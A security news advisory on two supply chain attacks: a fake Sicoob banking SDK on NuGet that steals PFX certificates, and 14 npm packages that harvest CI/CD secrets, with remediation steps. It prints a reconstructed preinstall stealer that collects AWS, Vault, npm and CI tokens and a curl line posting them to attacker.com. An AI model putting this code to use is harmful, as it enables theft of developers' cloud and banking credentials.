Malicious Sicoob NuGet Steals Bank Certs; 14 npm Packages Hit CI/CD

Two simultaneous software supply chain attacks surfaced this week: a malicious NuGet package (NuGet is Microsoft's package manager for .NET software, analogous to npm for JavaScript or PyPI for Python) impersonating the legitimate Sicoob banking SDK that silently exfiltrates PFX certificates (cryptographic files used to authenticate businesses for banking operations), and 14 malicious npm packages published in a single four-hour window by a threat actor named "vpmdhaj" that harvest AWS credentials, HashiCorp Vault tokens, and CI/CD (Continuous Integration/Continuous Deployment — automated software build and deployment pipeline) secrets from developer environments. Both campaigns exploit the implicit trust developers place in public package registries.

// 01 Sicoob NuGet Malware: Technical Details

Sicoob is one of Brazil's largest cooperative financial networks, providing banking services to millions of members. Its API allows businesses to automate banking operations — including instant payments via Pix QR codes and financial transactions — by authenticating with a client ID and a PFX certificate file. The malicious NuGet package Sicoob.Sdk (versions 2.0.0 through 2.0.4) mimics the structure and naming of a legitimate Sicoob integration library to deceive Brazilian fintech developers.

The attack mechanism is deceptively simple. When a developer instantiates the SicoobClient class with real credentials:

// Developer writes what appears to be legitimate SDK initialization:
var client = new SicoobClient(
    clientId: "company-client-id",
    pfxFilePath: "/path/to/banking-cert.pfx",
    pfxPassword: "secret-pfx-password"
);

The malicious constructor reads the PFX file from disk, Base64-encodes its contents, and immediately exfiltrates three pieces of data to a hardcoded third-party Sentry endpoint (Sentry is a legitimate error-monitoring platform that the attackers abused as a data exfiltration channel to avoid detection by outbound traffic monitors):

• The clientId — uniquely identifying the business in Sicoob's banking network
• The pfxPassword — needed to decrypt the certificate
• The Base64-encoded PFX file itself — containing the private key that authenticates the business for banking transactions

With this data, an attacker can impersonate the victimized business in Sicoob's payment network, authorizing transactions and accessing financial records. An estimated 500 downloads were recorded before the package was discovered — each a potential victim organization in Brazil's cooperative banking sector.

// 02 The npm Campaign: vpmdhaj's CI/CD Credential Harvester

Simultaneously, a threat actor using the alias "vpmdhaj" published 14 malicious npm packages on May 28, 2026, within a four-hour window. The packages use a combination of typosquatting (registering package names that are slight misspellings of popular packages) and metadata spoofing (copying the description, author fields, and keywords of legitimate packages to appear authentic in registry search results).

Targeted legitimate packages include:

• OpenSearch and Elasticsearch client libraries — used extensively in log analytics and search infrastructure
• DevOps toolchain packages — affecting build systems and deployment automation
• Environment configuration libraries — giving attackers access to .env files containing secrets

The attack mechanism uses npm's preinstall hook — a script that runs automatically when a developer runs npm install, before the package's main code is even loaded:

// Malicious package.json snippet:
{
  "scripts": {
    "preinstall": "node steal-credentials.js"
  }
}

// steal-credentials.js (simplified reconstruction):
const { execSync } = require('child_process');

// Harvest environment secrets
const secrets = {
  aws_key: process.env.AWS_ACCESS_KEY_ID,
  aws_secret: process.env.AWS_SECRET_ACCESS_KEY,
  vault_token: process.env.VAULT_TOKEN,
  npm_token: process.env.NPM_TOKEN,
  ci_token: process.env.CI_JOB_TOKEN
};

// Exfiltrate to attacker server
// execSync(`curl -s -d '${JSON.stringify(secrets)}' https://attacker.com/collect`);

The secrets targeted are particularly damaging in CI/CD environments where they are injected as environment variables:

• AWS credentials — granting access to cloud infrastructure, S3 buckets, and compute resources
• HashiCorp Vault tokens — providing access to secrets management systems that may hold hundreds of additional credentials
• npm tokens — enabling the attacker to publish packages under the victim organization's npm identity, enabling downstream supply chain attacks
• CI/CD tokens — allowing manipulation of build pipelines, code signing, and release processes

// 03 Who Is Affected

Sicoob.Sdk victims are primarily Brazilian fintech developers and businesses that have integrated with Sicoob's cooperative banking network for payment processing. Any organization that installed versions 2.0.0 through 2.0.4 of Sicoob.Sdk from the NuGet Gallery should assume their banking credentials are compromised and immediately contact Sicoob to revoke and reissue certificates.

npm vpmdhaj campaign victims are developers who installed any of the 14 malicious packages in development, staging, or production environments where cloud credentials are available as environment variables. CI/CD pipelines are particularly vulnerable because they often run npm install with full access to deployment secrets.

Organizations using GitHub Actions, GitLab CI, Jenkins, CircleCI, or similar platforms with AWS credentials or Vault tokens in the environment should audit their recent npm install logs for the affected package names. The specific package names have been documented in The Hacker News's reporting.

// 04 What You Should Do Right Now

• Sicoob users: revoke and reissue PFX certificates immediately. Contact Sicoob directly to invalidate any potentially compromised certificates. Audit Pix transaction logs for unauthorized payments.
• Uninstall Sicoob.Sdk versions 2.0.0–2.0.4 and replace with the legitimate SDK. Verify the package publisher identity and hash before reinstalling.
• Audit npm install logs for the vpmdhaj package names. Check your node_modules directory and package-lock.json for any of the identified typosquatted packages.
• Rotate all exposed secrets immediately — AWS keys, Vault tokens, npm tokens, CI/CD tokens. Assume any secret available as an environment variable during an affected npm install was stolen.
• Enable registry security controls:
• On NuGet: use NuGet Package Signing and verify publisher certificates
• On npm: enable npm audit in your CI pipeline and consider Socket Security for pre-install analysis
• Pin dependencies by hash rather than by version range in production environments. Exact version locking ("sicoob.sdk": "1.9.2") with hash verification prevents silent updates to malicious versions.

// 05 Background: Understanding the Risk

Software supply chain attacks through package registries have become one of the most effective initial access vectors in modern cybercrime, precisely because they exploit the fundamental trust relationship that developers have with public package managers. The npm registry alone hosts over 3 million packages, processes billions of downloads per week, and is integrated directly into the CI/CD pipelines of the vast majority of JavaScript-based development organizations.

The Sicoob campaign demonstrates an under-appreciated attack vector in regional financial ecosystems: targeting the SDK libraries for local banking systems that are widely used within a specific country but have limited global security scrutiny. Brazilian fintechs integrating with Sicoob's Pix payment system faced a particularly damaging attack because the stolen PFX certificates provide direct financial access — not merely credentials to a developer tool.

The vpmdhaj npm campaign follows the pattern established by earlier supply chain attacks including the 2021 ua-parser-js compromise, the 2022 node-ipc protestware incident, and the ongoing DPRK-attributed npm malware campaigns targeting developer credentials. The use of a preinstall hook is a known technique that bypasses many naive security controls, because the malicious code runs before the package is even installed — making post-install auditing ineffective.

Organizations should implement pre-install analysis tools that analyze package behavior before execution, not after. Both Socket Security and Phylum perform behavioral analysis of packages at install-time, detecting suspicious network calls, environment variable access, and child process spawning before any code runs.

// 06 Conclusion

A malicious NuGet package impersonating Sicoob's banking SDK has been actively stealing PFX certificates and banking credentials from Brazilian fintech developers, while 14 npm packages published by "vpmdhaj" targeted AWS and CI/CD secrets through a coordinated preinstall-hook campaign. Organizations using Sicoob.Sdk versions 2.0.0–2.0.4 must immediately revoke certificates and contact Sicoob; any development environment where the vpmdhaj npm packages were installed should treat all pipeline secrets as compromised and rotate them immediately.